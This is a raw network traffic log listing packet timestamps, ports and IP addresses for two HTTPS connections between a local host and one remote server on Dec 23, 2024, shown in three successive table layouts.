Dec 23, 2024 06:41:06.432641029 CET | 49730 | 443 | 192.168.2.4 | 104.21.86.72
Dec 23, 2024 06:41:06.432655096 CET | 443 | 49730 | 104.21.86.72 | 192.168.2.4
Dec 23, 2024 06:41:06.432756901 CET | 443 | 49730 | 104.21.86.72 | 192.168.2.4
Dec 23, 2024 06:41:06.432811975 CET | 49730 | 443 | 192.168.2.4 | 104.21.86.72
Dec 23, 2024 06:41:06.432826042 CET | 443 | 49730 | 104.21.86.72 | 192.168.2.4
Dec 23, 2024 06:41:06.440124035 CET | 443 | 49730 | 104.21.86.72 | 192.168.2.4
Dec 23, 2024 06:41:06.440195084 CET | 49730 | 443 | 192.168.2.4 | 104.21.86.72
Dec 23, 2024 06:41:06.440210104 CET | 443 | 49730 | 104.21.86.72 | 192.168.2.4
Dec 23, 2024 06:41:06.456600904 CET | 443 | 49730 | 104.21.86.72 | 192.168.2.4
Dec 23, 2024 06:41:06.456691027 CET | 49730 | 443 | 192.168.2.4 | 104.21.86.72
Dec 23, 2024 06:41:06.456707001 CET | 443 | 49730 | 104.21.86.72 | 192.168.2.4
Dec 23, 2024 06:41:06.504628897 CET | 49730 | 443 | 192.168.2.4 | 104.21.86.72
Dec 23, 2024 06:41:06.551769972 CET | 443 | 49730 | 104.21.86.72 | 192.168.2.4
Dec 23, 2024 06:41:06.555815935 CET | 443 | 49730 | 104.21.86.72 | 192.168.2.4
Dec 23, 2024 06:41:06.555882931 CET | 49730 | 443 | 192.168.2.4 | 104.21.86.72
Dec 23, 2024 06:41:06.555912971 CET | 443 | 49730 | 104.21.86.72 | 192.168.2.4
Dec 23, 2024 06:41:06.598373890 CET | 49730 | 443 | 192.168.2.4 | 104.21.86.72
Dec 23, 2024 06:41:06.623848915 CET | 443 | 49730 | 104.21.86.72 | 192.168.2.4
Dec 23, 2024 06:41:06.628964901 CET | 443 | 49730 | 104.21.86.72 | 192.168.2.4
Dec 23, 2024 06:41:06.629026890 CET | 49730 | 443 | 192.168.2.4 | 104.21.86.72
Dec 23, 2024 06:41:06.629046917 CET | 443 | 49730 | 104.21.86.72 | 192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.636954069 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.637034893 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.637049913 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.644884109 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.644951105 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.644965887 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.652775049 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.652832985 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.652853966 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.660871983 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.660933018 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.660949945 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.668987989 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.669054985 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.669070959 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.676877022 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.676938057 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.676951885 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.692713022 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.692781925 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.692802906 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.700581074 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.700680971 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.700686932 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.700711966 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.700758934 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.709526062 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.717442036 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.717524052 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.717545033 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.717664003 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.717725039 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.717736959 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.770287991 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.815382004 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.815596104 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.815685987 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.815712929 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.824003935 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.824084044 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.824100971 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.824162006 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.828737020 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.828756094 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.828821898 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.837651014 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.837719917 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.837735891 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.837790012 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.846071005 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.846110106 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.846155882 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.854173899 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.854195118 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.854249954 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.854265928 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.858355999 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.858433008 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.858447075 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.858505964 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.866367102 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.866449118 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.875250101 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.875354052 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.883289099 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.883358955 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.887341976 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.887469053 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.895229101 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.895345926 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.899173975 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.899377108 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.903651953 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.903723001 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.907592058 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.907665014 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.936176062 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.936311960 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:06.937982082 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:06.938076019 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.007405996 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.007492065 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.008869886 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.008956909 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.016031981 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.016119957 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.019155979 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.019227982 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.025046110 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.025137901 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.027837038 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.027924061 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.033328056 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.033401012 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.036140919 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.036211967 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.041434050 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.041523933 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.046736956 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.046823978 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.049535990 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.049607992 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.052184105 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.052270889 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.057440042 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.057523966 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.062746048 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.062834978 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.066109896 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.066190958 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.067935944 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.068006039 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.071176052 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.071249008 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.071274996 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.073746920 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.073831081 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.073862076 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.073923111 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.077049971 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.077121019 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.080420971 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.080492973 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.085961103 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.086045027 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.089252949 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.089322090 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.089339972 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.129756927 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.199812889 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.199836016 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.199876070 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.199928999 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.200072050 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.200073004 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.200115919 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.200176954 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.201226950 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.201293945 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.210763931 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.210808039 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.210897923 CET49730443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:07.210916042 CET44349730104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:07.211030006 CET49730443192.168.2.4104.21.86.72
Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Dec 23, 2024 06:41:07.211030006 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.220763922 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.220808029 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.220879078 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.220894098 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.221059084 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.221059084 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.230357885 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.230401993 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.230472088 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.230498075 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.230529070 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.230550051 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.238696098 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.238739967 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.238810062 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.238826990 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.238873005 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.238889933 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.248920918 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.248963118 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.249021053 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.249036074 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.249190092 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.249191046 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.257179976 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.257224083 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.257458925 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.257458925 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.257476091 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.257531881 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.282629967 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.282675028 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.282870054 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.282870054 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.282887936 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.282941103 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.395891905 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.395936966 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.395998955 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.396085024 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.396125078 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.396169901 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.404783010 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.404825926 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.404871941 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.404906988 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.404958010 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.404958010 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.412446022 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.412486076 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.412538052 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.412554026 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.412587881 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.412587881 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.421327114 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.421366930 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.421401978 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.421416044 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.421459913 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.421477079 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.430169106 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.430212021 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.430278063 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.430291891 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.430320978 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.430340052 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.438260078 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.438302994 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.438339949 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.438354015 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.438384056 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.438404083 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.445919037 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.445980072 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.446013927 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.446036100 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.446063042 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.446192980 CET  443          49730      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:07.446260929 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:07.449156046 CET  49730        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:42.289108038 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:42.289156914 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:42.289244890 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:42.312922001 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:42.312953949 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:43.541840076 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:43.541982889 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:43.591351986 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:43.591365099 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:43.592297077 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:43.592386007 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:43.595530033 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:43.643322945 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.226191044 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.226325035 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.226392031 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.226402044 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.226491928 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.226547956 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.226552963 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.226607084 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.226610899 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.229628086 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.229633093 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.230297089 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.234070063 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.237477064 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.237490892 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.237538099 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.242507935 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.243701935 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.243706942 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.243808985 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.250751019 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.253325939 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.417823076 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.417993069 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.418000937 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.418065071 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.421708107 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.425518990 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.429624081 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.432795048 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.432923079 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.432928085 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.432976007 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.440664053 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.441458941 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.441462994 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.441508055 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.448584080 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.449276924 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.456604004 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.457609892 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.457617998 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.457660913 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.464550018 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.464693069 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.464767933 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.464773893 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.464827061 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.472546101 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.473613977 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.480798006 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.481581926 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.481585979 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.481646061 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.488481998 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.489193916 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.489197969 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.489238024 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.495445013 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.495496988 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.495527029 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.495601892 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.609771013 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.612194061 CET  443          49737      104.21.86.72  192.168.2.4
